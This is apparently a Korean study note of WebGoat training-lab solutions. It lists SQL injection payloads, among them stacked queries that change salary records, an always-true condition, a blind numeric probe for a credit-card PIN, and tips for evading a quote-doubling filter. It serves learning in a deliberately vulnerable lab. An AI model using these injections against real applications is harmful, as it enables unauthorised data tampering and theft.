WebGoat 문제 풀이 (기초)

 

How to work with WebGoat
 
 
aaa'; UPDATE salaries SET salary=999 WHERE userid='jsmith
 

 

 

 

bbb'; INSERT INTO salaries (userid, salary) VALUES('DDDD', 333333)--

User ID: 101
101; update employee set salary=10000
101; update employee set salary=10000where userid=101
또는

101 update employee set salary=10000 where userid=101
101 update employee set salary= 10000

 

 

 

 

String SQL Injection

Smith' or '1'='1

 

Blind Numeric SQL Injection

101 AND ((SELECT pin FROM pins WHERE cc_number='111222333444')>10000);

빨간 숫자 부분을 계속 바꿔보기` 

 

 

 

 

 

 

2363 - 2364

 

 

 

 

 

 

 

 

입력필터 회피하기_필터3

인용부호가 있을 때,애플리케이션은 추가적인 인용부호를 기존 인용부호에 덧붙임. - 사용자 입력 값에 두 개의 인용부호가 있을 때, 인용부호 회피 마크로 인식돼서 무시됨

인용부호 2개('') = 회피마크 = 없는 것으로 간주

     -> 사용자 1개, 시스템 1개 합쳐진 형식

 

유저 네임 입력값에 대한 제한 - 10개 문자